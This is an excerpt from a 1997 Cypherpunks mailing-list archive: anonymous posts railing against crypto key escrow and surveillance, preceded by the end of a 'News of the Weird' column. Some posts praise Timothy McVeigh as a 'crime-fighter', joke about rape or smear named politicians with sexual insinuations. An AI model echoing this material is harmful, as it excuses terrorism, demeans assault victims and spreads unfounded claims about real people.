finally had to be outfitted with a Hannibal Lecter-type bonnet over
his face.  He was convicted and sentenced to 16 years in prison. And in a Providence, R. I., courtroom in April, Latin King gangster
George "Animal" Perry, on trial for murder and racketeering and
frustrated at the length of the prosecutor's closing argument, which
denied him a much-needed restroom break, rose from his chair,
unzipped his fly, and took one, anyway.   It seems reasonable that if one petitions the court for relief,
and is denied, then the only recourse is to relieve oneself.
* St. Charles Catholic Church (Picayune, Miss.) and nearby St.
Margaret Mary Church (Slidell, La.) posted security ushers at the
doors in February to make sure that parishioners were not
pocketing communion wafers.  Devil-worshiping ceremonies often
use wafers for symbolic desecration, and when six people were
seen leaving St. Charles in December with their wafers, the
churches' leaders began to fear a local Satanic conspiracy.   Nonsense. They were probably just trading them for drugs and
child pornography.
* In April in Houston, Tex., Robert Perry Russell, Jr., 44, was
sentenced to 20 years in prison for sexual assault and diapering of a
14-year-old boy, but police say the number of victims may have
been as many as 10.  According to police, Russell liked to take
boys out in a boat, tell them a tale about a headless killer seeking to
rescue a toddler from the dangerous lake and who kills all other
people, and suggest that putting on the diapers he happens to have
with him would be a good way, should the killer appear, of
convincing him of his toddler status.   And, as compensation for their pain and suffering, the victims
accepted the deed to Russel's prime real estate in Florida and
a bridge in the New York area.
DANGEROUS ACTIVITIES
* Dishwashing:  In March, a busboy at a Key West, Fla., Marriott
resort allegedly shot and killed a supervisor who had apparently
made some constructive criticism of the busboy's loading of the
dishwasher.  And in May, police in Helena, Ark., detained a 15-
year-old boy they suspect shot his older sister to death after a
dispute over which one would wash the dishes.   I'll wash, you die.
ADMINISTRATIVE NOTICES
[Except for the last paragraph, giving a new, alternative address
for Chuck Shepherd's CompuServe mailbox, these notices
unchanged since December 27, 1996]
NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.
Individuals may have the columns mailed to them electronically,
free of charge, approximately three weeks after the cover date,
which is the date when most subscribing newspapers will publish
the column.  Send a message to notw-request at nine.org with the
Subject line of Subscribe.  To read these News of the Weird newspaper
columns from the past six months, go to
(That site contains no graphics, no photos, no video clips, no
audio.  Just text.  Deal with it.)
COPYRIGHT:  Neither the name News of the Weird nor any
issue of News of the Weird nor any portion of any issue of News
of the Weird may be used for any commercial purpose
whatsoever.  One example of such prohibited use is to use part or
all of an issue of News of the Weird as material on a commercial
Web page or on a commercial message.  ("Commercial" includes
Web sites or messages that contain any paid or bartered
advertising.)  If a Web site or message contains utterly no
commercial content, and it is freely accessible by the public with
no fee charged, portions of News of the Weird may be used
without prior permission provided that the portion(s) is(are)
accurately quoted and identified on the Web site or message as
from News of the Weird and this copyright notice is affixed at
some point:  Copyright 1997 by Universal Press Syndicate.
BOOKS BY CHUCK SHEPHERD:  The Concrete Enema and
Other News of the Weird Classics by Chuck Shepherd (Andrews
and McMeel, 1996, $6.95) is now in bookstores everywhere. Or you can order by mail from Atomic Books, 1018 N.
Charles St., Baltimore MD 21201 (add $2 postage for the first
book, $3 for two to the same address, $4 for 3, and $5 for more
than 3) (credit card orders 1-800-778-6246,
  Or by credit card  from
Andrews and McMeel, 1-800-642-6480 (they bill $2 postage per
book).  Also by Chuck Shepherd and available at only the larger
bookstores in America:  News of the Weird (Plume Books, 1989,
$9), More News of the Weird (Plume, 1990, $9), Beyond News
of the Weird (Plume, 1991, $9), and America's Least Competent
Criminals (HarperPerennial, 1993, $9).  (The 1989, 1990, and
1991 books were co-authored with John J. Kohut and Roland
HARDCOPIES:  The weekly newspaper columns, as well as
Chuck Shepherd's weird-news 'zine View from the Ledge (now
in its 16th year) are available in hardcopy, but unlike with
cyberspace, they're not free.  Send a buck for sample copies to
P. O. Box 8306, St. Petersburg FL 33738.
AUTHENTICITY:  All news stories mentioned in News of the
Weird are from news stories appearing in daily newspapers in the
U. S. and Canada (or occasionally, reputable daily newspapers in
other countries or other reputable magazines and journals).  No
so-called supermarket tabloid, and no story that was not intended
to be "news," is ever the source of a News of the Weird story. ADDRESSES:  To send mail and messages to Chuck Shepherd,
write Weird at CompuServe.com or P. O. Box 8306, St.
Petersburg FL 33738.

@_date: 1997-07-11 03:48:53
@_author: Anonymous 
@_subject: Cast of Characters for Crypto Politics (Judiciary Hearing) 
Legislators should be made to vote with their dicks hanging out.
Any legislator with fresh lipstick on his dick gets his vote thrown
out. It may not be a perfect system, but I wouldn't bet against it
being better than what we have now.
  The "classified briefing" by LEA smells like a classic example of
"Of course, if you vote against this bill then we will be forced to
expose you as a champion of pedophiles and drug czars."
  So you're sitting there at the police computer, checking out Dahmer's
floppies, which contain only letters to his mother, and you realize that
if they are encrypted, then they are proof that he has something
to hide. Hmmm...
  Or you realize that the Judge will imprison Tim May for contempt of
court until he provides his secret key, and you realize that if it is
encrypted with a key Tim doesn't have, that the Judge will have to
decide whether to believe the outrageous accusations of Tim May, Jim Bell's best friend (according to a reliable informant), against a
champion of law enforcement.
  There are times that I wish Tim was a little less perceptive. It would
give me a little room for self-deception when I need to take a break
reality and try to tell myself that there is some slim ray of hope for
freedom and liberty to prevail.
  Why is it that the "stampede" always seems to manage to head in the
direction needed to trample the constitution underfoot (like tornados
sniffing out trailer parks)?
SEN. JOHN ASHCROFT (R): Emerged as a staunch
crypto-defender.   I originally thought that perhaps he was taking this stance as a
matter of principle, but then I heard that he had purple lipstick
on his dick.
  Does anyone know what color Blanc wears?
  (Just curious. I certainly wouldn't want to start any unfounded
rumors. However, for the record, I would like to assure Blanc that
if the bill happened to be defeated by a substantial margin, I
wouldn't think any less of her.)
  I think I need to go spank myself.

@_date: 1997-07-11 03:49:32
@_author: Anonymous 
@_subject: TRUTHMONGER UNMASKED!!! 
Jim Choate, realizing that he finally had solid evidence as to
the true identity of the coward hiding behind the TruthMonger
persona, forwarded to the list:
  Spoken like a TruthMonger!
  I always had my suspicions that the main person using the TruthMonger
multi-user persona on the CypherPunks list was acting out of some kind
of obsessive, guilt-driven psychosis as a form of repentance for great
evils being commited under his true identity.
  Chretien, as Prime Minister of Canada, has to live with the knowledge
that in order for his country to survive he needs to kowtow to a gang
of criminals in a neighboring country who have the firepower to smoke
the Canadians' butts in a heartbeat.
  The TruthMonger posts are more sporadic when Chretien is involved in
international conferences, and it is now obvious that the pressure of
living a lie builds up and spills out at these times when he cannot
relieve himself of his guilt using his TruthMonger posts.
  I suspect that Belgian Prime Minister Jean-Luc Dehaene is Rabid Wombat
and Luxembourg's Prime Minister Jean-Claude Juncker is masquerading on
the list as Dr. Dimitri Vulis, KOTM.
  The CypherPunks list is the one place where they can let their hair
down and tell Big Brother Bill and the whole goddamn world what they
really think.
  Or, as Chretian would have put it, as TruthMonger, "Big Brother Bill
is a lying, Nazi, sack of shit whose main concern in regard to world
security is his ability to use it to suck Daley's big vote-cock."
  True CypherPunks, they are laughing their asses off that "we the
sheeple" let these charlatans and criminals rob and oppress us under
the guise of democracy.
  Unfortunately, he didn't have the political balls to testify for the
defense in the Timothy McVeigh trial, so he had to express his support
for McVeigh as TruthMonger.
  What the fuck is wrong with the American people?
  Here are three world-leaders who openly acknowledge that the U.S. is
in the hands of gangsters who would be imprisoned for crimes against
the citizens and the country if justice truly prevailed in America. And
a single conversation, accidentally(?) revealed such as this one, is no
doubt just the smallest of samples of the stinking rot that lies at the
heart of a gang of criminals who are actively working to subvert the
constitution of the country in the interests of furthering their ever-
tightening, fascist grip on the reins of power.
  The same government which trained Timothy McVeigh to kill (and then
fucked over his Desert Storm compatriots when their service to their
country cost them their health) used their trained, "it's all there in
the press release" news dogs to turn their own penny-ante hired gun
into a "monster" symbolizing patriotic paramilitarists whose concern
lies with defending America at home rather than murdering foreigners
for "votes."
  Slipping in the polls because you murdered and fucked over too many
of your own citizens? Whack out a pile of worthless foreigners with
high-tech weapons that allow us to slaughter them wholesale without
losing any American lives. Watch your poll stats rise as Americans stand
and cheer the murder of defeated, retreating troops by aircraft missles
which weren't designed to take prisoners.
  Act surprised when 800 government law enforcement agents with the latest in technology claim to be unable to prevent men, women and children that were victims of a botched government assault from dying
a horrible, burning death. Act outraged when the chickens come home to
roost in Oklahoma City.
  The reason they are not in prison here is because they are armed
and dangerous and have managed to disarm and disenfranchise their
citizens, making any resistance to government fascism a criminal   We get to vote for the criminal of our choice from among the
group of criminals that the other criminals pre-select for us
and whose campaigns they support with our stolen booty.
  If a "ringer" slips through, such as Kennedy, he is murdered
and the criminals make a great show of patriotic mourning. If
a no-name schill is foisted on the public as vice-president,like
Agnew, and will take power because the "gang leader" is getting busted,
remove him on the basis of what are "parking tickets" compared to the
crimes of most of your cronies.
  World-leaders recognize that the American citizen is just a stupid
'mark' who is getting fucked in a sophisticated con by men who have no
qualms about stealing senior citizen's life savings (Social Security)
stealing votes and elections (bribery, sabotage and power mongering),
and stealing the rights and freedoms of the citizens by lying about
the need to stop illegal drugs (which remain freely available no matter
how many of our rights and freedoms are stripped).
  I don't have a death-wish of any sort, but if I happen to get killed
by someone striking back at the enemies of freedom who are usurping the
constitution to tighten their criminal control over the citizens, then
I can think of far worse reasons to die.
  We lose 169 people every time a bean-counter decides it's cheaper to
pay off the families of the dead instead of spending an extra nickle
on every seat-belt installation in an automobile. We lose 169 people
every time some Senator decides we need a new weapons system instead
of new hospitals or medical services. We lose 169 people every time
the President decides to stomp on the citizen's rights instead of
giving them enough freedom to feel like they can face life without
numbing their senses to the stench around them with ever-increasing
amounts of narcotics.
  Gambling is a government-regulated criminal enterprise, now, and
Timothy McVeigh's ante was just to establish that the citizens are in
the game. I wouldn't be at all surprised to see some heavy betting taking place from all the players who choose to "sit in."
  American sheeple may regard McVeigh as a "monster," but world-leaders
make a strong case for viewing him as a "crime-fighter."
A. Cretin

@_date: 1997-07-12 04:13:38
@_author: Anonymous 
@_subject: New Add-On Law / Re: Freeh's Testimony (FBI Seeks Domestic GAK) 
Duncan, as he often does, points out a small truth which goes
to the very heart of the issue of criminalizing strong encryption.
  Criminalizing crypto is criminalizing _private_speech_ and also
  Mark my words, when the day comes that LEA's have the technology
to read human thoughts, then we will be seeing this same debate taking place in that arena. The "legitimate needs of law enforcement"
rhetoric, et al, will be drug out for the billionth time to thwart
the danger that a CypherPunk might fart in the woods without an
LEA recording it.
  Think back to the first time you read "1984" and think about what
you, yourself, could _add_ to the book from your own personal
knowledge and experience since that date.
  If we added all of the instances of "Big Brother" becoming an
accepted reality of everyday life since then, the tome would rival
"War and Peace" in volume and scope.
  If I choose to write my prayers on a word processor, in order to
better organize my spiritual thoughts and be able to reference them
to remember my promises to God, does the State have a right to
demand I let them view those prayers, and private religious thoughts?
  If I use a computer to write my attorney, perhaps even outlining
my activities, etc., in regard to criminal charges against me, does
the State have a right to demand access to it?
  Am I allowed to whisper to my lawyer in court, but not to type
what I want him to know on a computer screen he has in front of
him in the same courtroom?
  Am I allowed to tell a $200/hour psychiatrist that someone made me
mad enough to "kill" them in order to stay sane enough not to do so,
and have it kept confidential, but be denied the right, if I am a
poor person, to do the exact same thing in writing on my computer,
with the help of a $4.95 paperback self-help/psychology book?
  Have private thoughts been "corporatized/governmentized" somehow?
Are our private thoughts sacred only when shared with a recognized
authority? If I share them with myself, do they become the property
of the State?
  Am I totally out of my mind, or has life become tremendously
fucking scary, and nobody but me has noticed?
  Sometimes I feel like the guy on the plane in the "Twilight Zone"
movie, who is the only one who can see the monster on the plane's
wing that is endangering everyone's life. And if you shoot at the
monster nobody else can see, then they strap you down and take you
to the rubber room. (Obvious analogy to McVeigh and Death Row purely unintentional.)
  {"Your honor, this search warrant is for the purpose of cracking
the suspect's head open with a crowbar and prying his brain out so
that we can poke around, in _good_faith_, I assure you, and look
for evidence that pertains to a crime that may have been committed.")
  If you don't provide a breathalyzer sample, you are automatically
guilty of drunken driving (even if the DMV License Tester is handing
you a perfect score/report as the officer places you in handcuffs).
  I have no doubt that under future key escrow laws that your prayers
to God and your letters to yourself detailing the most intimate details of your life will make you automatically guilty of tax evasion
unless you allow strangers who are hostile to you (police, judges,
prosecutors) to read them.
  Yes, and one day, even our private thoughts will be considered to
automatically make us guilty criminals unless we allow LEA's access
to them. (The "lie detector" is a case in point, and it has in the
past come dangerously close to being afforded the same status as
the breathalyzer, even though it represents "voodoo" as much as it
does "science.")
  If a tree falls in the forest, and nobody hears it--is it a drug
trafficking tree or a child molesting tree?

@_date: 1997-07-12 04:51:06
@_author: Anonymous 
@_subject: Routing around damage 
Remember "the internet interprets censorship as damage and routes around
it"?  I'd be happy with an internet that interprets DAMAGE as damage and
routes around it.

@_date: 1997-07-12 06:07:22
@_author: Anonymous 
@_subject: NEWS: Freedom of Movement Could Cripple Cops, FBI Warns 
This is proof that Freeh has finally learnt to read, and has completed (we
hope) "1984" and is applying it to his own world. Perhaps Freeh wasn't
allowed to become a Big Brother, for the group of the same name.
This is proof that Freeh has finally learnt to read, and has completed (we
hope) "1984" and is applying it to his own world. Perhaps Freeh wasn't
allowed to become a Big Brother, for the group of the same name.

@_date: 1997-07-12 06:24:12
@_author: Anonymous 
@_subject: New Add-On Law 
Can the LEA have a blanket wiretap in a confessional booth in hopes of gaining evidence of organized crime? Are they permitted
to monitor all confessions or just the ones stated in the
warrant? Do LEA view themselves as God?
Forgive me mother for I have sinned. I have used un-GAKd crypto
in my preperations of my writings about theology.

@_date: 1997-07-12 06:56:58
@_author: Anonymous 
@_subject: From Bad to Worse / Re: Jim Bell (FINALLY!) Charged 
I was arrested for "arson." They said that if I'd turned her over,
then the charge would have been "rape."
  My lawyer pleaded it down to "assault with a friendly weapon."
(The prosecutor argued for "dangerous weapon," but I was fortunate
enough to have a male judge, so the evidence didn't stand up in
court when it was presented for inspection.)
  Perhaps the others are all decent, law-abiding conspirators who
planned to have Dr.Kevorkian "help" government officials and, rather
than "overthowing" the government, will merely act as executors (pardon the pun) of the e$tate.
  Everyone knows what "Coyote Ugly" is...do you know what "Jailbird
Ugly" is?
  It's when a woman is so ugly that her rapist is sentenced to
_do_ her again--from the front.
"Justice is a two-edged place to put your sword."
Something's wrong when I'm sodomized under an increasing number of laws.
Only one response to the dick grabbers is warranted: "Pull!...Pull!"
Mayor Maynot                | Sexual Anarchy: raincoat encryption, mm at got.sum     408-728-0152 | anonymous sex, digital fetishes, Zippo
W.A.S.T.E.: Corralitos, CA  | knowledge, bad reputations, sex markets,
Higher Power: 2^1398269     | black sex markets, collapse of boners.
"Chastity belts aren't even hemmeroids on the anal bi-way."

@_date: 1997-07-12 14:53:53
@_author: Anonymous 
@_subject: The Recent Trend in "Collective Contracts" 
"Smokers who are ill could no longer sue tobacco companies seeking
    punitive damages for past industry misconduct, but they COULD SUE
    TO RECOVER ACTUAL DAMAGES SUCH AS MEDICAL BILLS.  SMOKERS STILL
    COULD SUE FOR AND COLLECT BOTH ACTUAL AND PUNITIVE DAMAGES FOR ANY
    FUTURE INDUSTRY WRONGDOING."
Of course.
I suppose it could be just as accurately said that you troll the group
with government-unfriendly shilling.  Some have an unfortunate habit
of rising to the bait.
Possibly.  Obviously not doing a very good job.  Clearly, my ignorance
is boundless, and what I know is very tiny indeed.  However, I observe
that you are very familiar with pomposity, and should therefore be a
good judge.  I don't know about Detweiler.  In my short tenure on this list Vulis
has given no evidence that his intent is to "disrupt the group" -- he just seems to express his sometimes extreme opinions.  Like you.
In any case, it is not true that my intent is to "disrupt the group",
and it is hard to see how my few, offhand posts on the topic of the
tobacco agreement could be seen as anything remotely approaching a
deliberate campaign.  I think you are attributing me far more potency
than is warranted.

@_date: 1997-07-13 07:41:22
@_author: Anonymous 
@_subject: The Recent Trend in "Collective Contracts" 
I try not to contemplate your impotence too often, Kent.
Damn.  Kent's figured out anonymous remailers.  I read this message because it came from anonymous--Kent's in my killfile.
Know what this means?
Anonymous remailers have more reputation capital than Kent.

@_date: 1997-07-13 09:01:04
@_author: Anonymous 
@_subject: Citizens' Butts Open to Key Recovery Alternative 
Didn't one of the list members just mention a "cracking open the
citizen's brain with a crowbar" plan? Has anyone forwarded it to
McCain yet? Is he proposing "use of a thick skull in the commission
of a crime" legislation yet?
  Which is their way of saying that compromise and selling-out is
going to come at a premium price on this issue.
  And will thus provide outrageous profits for those who are chosen
to pluck _this_ golden goose. (CryptoStar Wars?)
  Less "blatantly" intrusive? Less "obviously" intrusive?
  or
  More "secretly" intrusive? More "sneakily" intrusive?
  Less "fascistly" intrusive? Less "unconstitutionally" intrusive?
  or
  More "justifiably" intrusive? More "corporately" intrusive?
  Translate that to say, "To work one industry giant against the
other." or "To engender in each of them the fear that their chief
competitor will be chosen to profit outageously for helping to violate the civil rights of their customers.
  Translate that to say, "to allow law enforcement to wiretap _all_
digital communications and transactions in order to decide which
ones they wish to apply for a _legal_ wiretap for."
  The reason it is called "Capitol Hill" is because there is a "mountain of capital" waiting for anyone who wants to play ball
with the criminals who inhabit that dark lair.
  Tim May pointed out the "fever" overtaking the legislators to
be the first to mine the "hard on drug dealing pedophiles" gold
that the LEA's have promised them on this issue.
  McCain is now making the rounds of the corporate players to
offer them a chance to help draw the map that will lead to the
thirty million pieces of silver the Romans in D.C. are offering
anyone who will betray the citizens.
  "And as BillyG was beneath in the Whitehouse, there cometh one
of the maids of Louis Freeh:
  "And when she saw BillyG counting his money, she looked upon him,
and said, 'And thou was also wast with Citizen of the Constitution.'
  "But he denied, saying, I know not, neither understand what thou
sayest. And he went out of the Lincoln bedroom onto the Whithouse
lawn to count his money; and the cock(sucker Louis Freeh) crew.
  "And a maid saw him again, and began to say to them that stood
by with large guns and open warrants, 'This is _one_ of them.'
  "And he denied it again. And a little after, they that stood by
said again to BillyG, 'Surely thou art _one_ of them: for thou
art a FreeMarketer, and thy speech agreeth thereto.
  "But he began to curse and swear like a CypherPunk, saying,
'I know not this Constitution of which you speak.'
  "And the second time the cock(sucker Louis Freeh) crew.
  "And BillyG called to mind the word that the Citizen said unto
him, 'Before the cock(sucker Louis Freeh) crow twice, thou shalt deny
your customers' civil rights thrice.' And when he thought thereon,
he wept."
  Will Netscape's Moses Weinstein come down from the "mountain of
capital" with the stone tablets upon which are engraved the
command-line-ments which will be used to access the records of
those who own the golden calves and the goats?
{Old Testament Joke: "What is the difference between a Gentile
and a sacrificial lamb of God?"  Answer: "Tablet escrow."}
{New Testament Joke: "What issue should have been addressed by
an "amendment" to the Torah that was essential to protect "Religious Security" and prevent the overthrow of the Pharisees
and Saudecees?"   Answer: "Body recovery."}
Jesus F. Christ of Nazareth (the band!)
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
"I am the Way(-out) and the Truth(Monger) and the Light (that
doobie and pass it over here)."
"There is something wrong when I'm a sinner under an increasing
number of commandments."
"Spirituality interprets commandments as damage and rises
above them."

@_date: 1997-07-13 09:08:26
@_author: Anonymous 
@_subject: Airlines to start profiling, bag matching 
Or, as I was saying to Lucky Green the other day,
"Do you feel _punk_, Lucky? Well...do you?"

@_date: 1997-07-13 14:45:58
@_author: Anonymous 
@_subject: From Hatch's testimony 
Try to think of laws as outlining what we are no longer free to do.
Then go to a courthouse library and look at the mountains of books which contain a list of the freedoms that have been taken away from us.
  Who the fuck do the people who pass these laws think they are?
  I wish I had a nickle for every local city councilman who got a
hard-on the first time he got to vote on a bylaw that empowered him
and his pals and fucked everyone else. Then, once he's convinced
himself that this -->|       |<-- is 12", he decides that it is his
duty to run for Congress and share his "greatness" with the whole
  I try to pay my parking tickets more than 500' from a schoolyard
and sell my drugs before the date I'm due to appear in court, but
I keep getting in trouble because I just can't keep up with all of
the intricate details involved in being a law-abiding citizen.
  What happened to the "good old days" when all you had to do was
stay out of stone-throwing range of the "righteous" in order to
live according to your own dictates?
  Today, the "righteous" feel that they have the right to come
in your home whenever they want, demand the wrong to read all of
your correspondence, tell you what you can put on your website,
limit what thoughts you can express and how you do so.
  And it never ends. If you want to build a dog-house you have to
deal with an army of people who are upholding the "righteousness"
of city permits, union rules, ecology regulations, tax laws, and
a multitude of similar bullshit. And if you happen to forget to
cross a 't' or dot an 'i', then you find you are in violation of
a new law which is classified as an "inconsequential felony."
Def. 'inconsequential felony' -- A legal term which refers to
a harmless action which is nonetheless subject to the severest
of punishments because someone in authority got a wild-hair up
their ass for some silly reason and deemed it should be so.
  I met a man in Texas who spent twenty years in prison for the
possession of a few stems and seeds. He thought it ironic that
the state had imprisoned him for twenty years to try to prevent
him from doing something that someone else thought would ruin
his life.
  He told me that at his sentencing, his mother told him, "I told
you smoking dope would ruin your life." She got upset when he was
"unrepentant" enough to reply, "No. I think the judge did that."
  The problem is not that the citizens are "sinners" but that
Hatch and his ilk are "righteous." When the "righteous" take it
on themselves to speak for a "higher power," whether it be "God"
or "National Security," then they begin justifying even the most
horrendous of actions as "just following orders."
  Thus, it's not really going to matter whether you are using crypto
to encrypt children's pictures or a new version of the Bible. Coming
new laws will make you a criminal either way, because the "righteous"
feel that it is up to them to decide if the children's pictures are
pornographic or if the new version of the Bible is sacreligious.
  Government has merely usurped religion as the final authority on
who is "righteous" and who is a "sinner," on what is "good" and
what is "bad." They are priests with nuclear weapons to back them
up in enforcement of their "commandments."
  The end result is that we have to fear getting nuked if we build
the fence around our house more than 5' high, so that the ever-
vigilant "righteous" don't hurt themselves when peeking over our
fence to see if we've built an illegal doghouse. And we have to
fear getting nuked if we want to electronically "whisper" when
the "righteous" are trying to spy on the "sinners."
  Same shit, different religion.

@_date: 1997-07-13 16:08:39
@_author: Anonymous 
@_subject: The Recent Trend in "Collective Contracts" 
Excerpt From:           Welcome to the
                  Cypherpunks Mailing List (TcM)
                  ------------------------
  Your initial post to the list has been digitally classified by the
Cypherpunks Automated Response system in order to determine the initial
level of reputation capital you will be awarded as a new member of the
Cypherpunks Mailing List (TcM).
At Reputation Capital levels below -1, you may be subjected to shame,
humiliation and filtering to the point where the only hope for your
posts being read is for you to post to the list anonymously, as a
"Monger" of one sort or another.

@_date: 1997-07-15 02:06:00
@_author: Anonymous 
@_subject: Jerry Springer Crypto Special 
Sitting at home this morning I decided to turn the TV to the Jerry
Springer show, assuming that, since his network was trying to promote
him as a News person, his show would no doubt be dealing with a serious
issue such as the future of the InterNet, encryption, censorship, etc.
  Instead, the show turned out to be titled, "I Cut Off My Manhood." It
was a delightfully artful mosaic about a guy who cut off his penis with
gardening shears, the queer stalker who had killed the penisless guy's
cat by throwing a recliner across the room, the stalker's lesbian friend
and two fairly average relatives of the self-mutilater who apparently were there to confirm for us that cutting off one's penis with a pair
of gardening shears is a bit over the edge, to say the best.
  Although I was disappointed in that encryption issues were not being
addressed on the show, I did get somewhat enlightened as to what we
can do to help spread strong encryption.
  The Jerry Springer audience got to see pictures of the mutilated penis
(I assume in close-up color glossies) while those of us at home had to
be content to watch the audience members groan and try not to throw up.
I immediately realized that if the show had been on WebTV and pictures
of the mutilated penis were available to home viewers in encrypted form,
that "Applied Cryptography" would soon be on the Best Seller lists
around the nation.
  Thinking about crypto issues from the standpoint of female body parts,
I realized that GAK and Key Recovery are likely to become a part of our
everyday reality because Silicon Valley Crypto has the same allure as
Silicon Breasts.
  We live in a bottle-fed society that has learned from infancy to
accept substitutes for the real thing. From topless bars to the beach,
we are willing to settle for the illusion that matches the advertised
product our minds have been sold, rather than accept the forms that
exist in reality and take the time and effort to find ones that truly
suit our needs and desires.
  Is a society that eats food that sometimes has less nutritional value
than the package it comes in, are the masses going to demand "the real
thing" in a crypto product, or will they settle for a watered down
product which "meets government standards" and comes in a pretty box?
  The masses don't have the time or expertise to test the nutritional
value of their food or the security of their crypto. They depend on
the government, corporations and the press to provide them with the
products and information to make a rational choice as to what truly
meets their needs.
  The government's main interest is power over the citizens; the
corporation's main interest is profiting from the citizens; the press'
main interest is pandering to government and corporations enough to
be kept from getting cut "out of the loop" of money and power.
  The only hope the masses have of getting anything resembling a square
deal in regard to the products and information they are fed is for
there to be enough individuals within the government, corporations and
the press who are willing to resist the mindless, self-perpetuating
evolution of these non-human entities, and make an effort to provide
products and information which have real value based on the goals which
they are designed and advertised to meet.
  There was a discussion on the list as to whether the cypherpunks who
have "gone corporate" are a blessing or a curse to the spread of strong
crypto. I think that the answer lies in the individual and in the final
product of their efforts.
  Perhaps crypto needs Colonel Tom Parker to promote it, with Barnum and
Baily bringing the Silicon Rockettes to town to give away pictures of
of a mutilated penis which can only be viewed using a strong crypto
product. ("As seen on the Jerry Springer show!")
  The Dark Forces are making a concerted bid to set the direction and
the tone of crypto debate and crypto development in a manner which will
lead to the negation of the constitutional right to have our freedom and our privacy unfettered by government intrusion.
  It is not government, nor corporations, nor the press, who ultimately
decide whether our freedom and privacy will be maintained or whether it
will be compromised. It is the individuals who make a decision whether
to go along with the abrogation of our rights in their own individual
self-interest, or whether they will speak out and/or resist those who
put the goals of organizations over the interests of the people.
  Our government and our society are being directed by manipulation of
the same mob mentality that is in evidence on the morning talk shows.
The voice of reason gets shouted down unless there are enough people
who realize that the answer to noise is more noise.
  The greater the position and authority of an individual, the more
noise they are able to make to counter the efforts of those who are
attempting to work the mob into a frenzy for their own aims. Thus
the greater is their responsibility to act in the long-term interest
of freedom. At the same time, unless there are people of conscience
at every level of government, corporation and society who are willing
to take a personal stand, and to support those in higher positions
who take a stand, then freedom is doomed.
  There is a Swiss bank security guard who discovered bank records
about to be shredded which detailed the accounts of Jews who were
victims of the Holocaust. He chose to resist "going along" with the
government laws, corporate rules, and societal taboos against making
a decision based on one's own conscience, and he "stole" the records
in order to prevent them from being destroyed.
  He was threatened with death, prosecution, had to leave his home
and country behind and faces an uncertain future.   There is a cost to resisting the fascism of organizations and of
society itself, and the less that resistance is spread among us,
then the greater the cost that each of us has to bear.
  Resist. Make noise.
  The freedom you save could be your own.

@_date: 1997-07-15 07:34:40
@_author: Anonymous 
@_subject: law as enemy: was Re: Jim Bell reference 
You are both right.   Strong crypto will obstruct LEA's from doing the *millions* of
unauthorized taps on communications in their "holy war" against   Strong crypto will merely shift the nature of crimes being commited
from LEA-originated to criminal-originated, which is the way God has
planned it to be from the beginning.
  If we are going to play good-guy/bad-guy, there ought to be a real
difference between the two. Kids on a playground know that much.
  Attitudes like this are the cause of the erosion of our freedom and
privacy.   "Give me compromise of freedom or give me death."    "It is better for ten innocent men to be convicted than for one
guilty child molester to go free."   Why do we never hear anyone saying "Sure, the legal system just
fucked me silly and unjustly ruined my life, but it is 'still overall
of use to the public'."? The reason is that a roll of the dice isn't
good enough when it comes to *ourself* receiving justice.
  Anyone who is comfortable for a roll of dice to decide the justice
received by *the other guy* is a fool and your enemy.
  Bullshit. The current hot-ticket item in Canada is video of the girls
being tortured, raped and murdered by Paul Bernardo. These videos are
coming from the people involved in his prosecution and imprisonment.
  Are the TV networks cooperating with criminals by profiting from the
pictures of the OKC bombing, etc? Their extensive coverage certainly
makes such actions a good public forum for the potential terrorist.
  I have no doubt that Paul would love to do so, if it weren't for the
fact that he would be subjected to imprisonment and lawsuits if he took
action to protect his home and property from intruders during his absence and some ignorant thief got himself hurt or killed.
  Legislators and LEA's bemoan the fact that the constitution ties
their hands in fighting crime, but the fact is that they are creating
a mountain of new crimes through legislation and stings instead of
putting their effort into dealing with real, existing crime.
  Miscarriage of justice is the rule of the day in the current legal
system. The fact that the reins of power and control of the media is
not in the hands of the poor, minorities, and social outcasts means
that those who are busy participating in and/or supporting the gross
miscarriages of justice are those who paint the system's public face.
  Not as long as you willing to settle for corruption of justice and
the compromise of freedom being justifiable as being of "overall of
use to the public."
  I don't choose to sell my weapons and walk around with a "kick me"
sign on my back, trusting in strangers to defend my life and liberty.
I resent those who choose to do so intimating that I am some kind of
lunatic/radical for choosing to take personal responsibility for
defending my life, liberty and beliefs.
  I am not against joining with others in forming organizations which
are of mutual benefit to all. I am merely against these organizations
being in the hands of self-serving criminals who want control over
all of my movement and communication in order to guard their usurped
  I am willing to defend myself, my neighbors, my country. I am not
willing to defend a corrupt system which imperils the freedom and
privacy of myself and my fellow citizens.

@_date: 1997-07-16 16:37:09
@_author: Anonymous 
@_subject: CCTV Cameras in Britain 
Does this 'move' the crime to a different area? If so, then the
next step will be to add cameras to the other areas. Eventually,
I suppose, it will only be safe to commit crimes in the homes of
the (unarmed) citizens. By then, I am sure the citizens will protest very little when the government decides that cameras are
needed in every home to fight "drug dealers and child pornographers."
  The U.S. is now inundated with a plethora of "Good Cop" shows and
an increasing variety of "Dumb Criminal" video shows, including a
few specials that are blatantly geared to spread the message, "The
Surveillance Camera Is Your Friend!"
  This is not the result of happenstance. The whitewashing of LEA's
and other government agencies, as well as the promotion of the belief
that Constitutional rights are our enemy (and the friend of crime),
are the result of conscious, active direction on the part of those
in power.
  This type of thinking is exactly the reason that government
interests lie in creating more crimes and more criminals.
  Since an ounce of good marijuana costs $300.00 instead of merely
$3.00, it is profitable to not abide by the law. Since it is also
cause for imprisonment, it makes it worthwhile to use violence in
order not to get caught with it. Under the "life imprisonment for
a third felony" laws, you might as well rob and kill someone as
write them a $1.00 bad check (or be better off, in some states).
  If so, then consider feeling ashamed *now* for that fact that your
lack of attempt to protect your rights, and other's rights, is causing
the death of innocent people because security against those who want
their freedom has been increased.
  Both the U.S. and Britain send armed thugs to foreign soil to force
their citizens to live according to our belief in what is right, and
then we call them *terrorists* when they respond to armed force with
armed force.
  With the use of radar to create "speed traps," government realized
the profits to be had from *creating* crime and they have never
looked back.
  I have no doubt that the surveillance industry will prove every
bit as profitable as the prison industry, and just as easy to sell
to a citizenry that is being frightened and held hostage by a
government which should be protecting them and helping them to
protect themselves.
  Save your "In order to save the patient, we had to kill him."
laws-and-technology speech for forums where freedom and privacy
are considered less precious than comfort and security.

@_date: 1997-07-16 16:54:03
@_author: Anonymous 
@_subject: The Big Sellout 
Translation~~They will attempt to imprison people who are victims
of those who voluntarily access their web sites and then complain
to the authorities, despite the sight being clearly marked as a
adult-oriented site.

@_date: 1997-07-17 05:47:45
@_author: Anonymous 
@_subject: White House "kinder, gentler"-CDA 
